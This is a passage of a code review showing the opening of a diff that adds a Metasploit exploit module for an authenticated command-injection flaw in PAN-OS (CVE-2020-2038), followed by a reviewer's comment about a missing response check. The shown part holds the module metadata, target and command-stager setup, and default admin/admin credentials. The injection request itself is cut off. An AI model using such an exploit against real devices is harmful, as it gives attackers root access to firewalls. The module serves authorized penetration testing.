modules/exploits/linux/http/panos_auth_rce.rb

```diff
@@ -0,0 +1,164 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  require 'ipaddr'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Palo Alto Networks Authenticated Remote Code Execution',
+        'Description' => %q{
+          An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated
+          administrators to execute arbitrary OS commands with root privileges.
+          This issue impacts PAN-OS versions < 10.0.1, < 9.1.4 and < 9.0.10
+        },
+        'Author' => [
+          'Mikhail Klyuchnikov', # Vulnerability discovery
+          'Nikita Abramov', # Vulnerability discovery
+          'UnD3sc0n0c1d0',                          # Exploit
+          'jheysel-r7'                              # msf module
+        ],
+        'References' => [
+          ['CVE', '2020-2038'],
+          ['URL', 'https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/'],
+          ['URL', 'https://security.paloaltonetworks.com/CVE-2020-2038'],
+          ['URL', 'https://github.com/und3sc0n0c1d0/CVE-2020-2038'] # Exploit
+        ],
+        'DisclosureDate' => '2020-09-09',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_CMD,
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux x86',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X86,
+              'CmdStagerFlavor' => %i[echo printf]
+            }
+          ],
+          [
+            'Linux x86_64',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64,
+              'CmdStagerFlavor' => %i[echo printf]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'WfsDelay' => 2 },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptBool.new('SSL', [true, 'Use SSL', true]),
+        OptString.new('USERNAME', [false, 'PAN-OS administrator username', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for username', 'admin'])
+      ]
+    )
+  end
+
+  def check
+    print_status('Authenticating...')
+    @api_key = api_key
+    res = send_request_cgi({
```

Comment:
Missing a check on `res` here. Should check that and handle it in case the API key was returned but this request failed.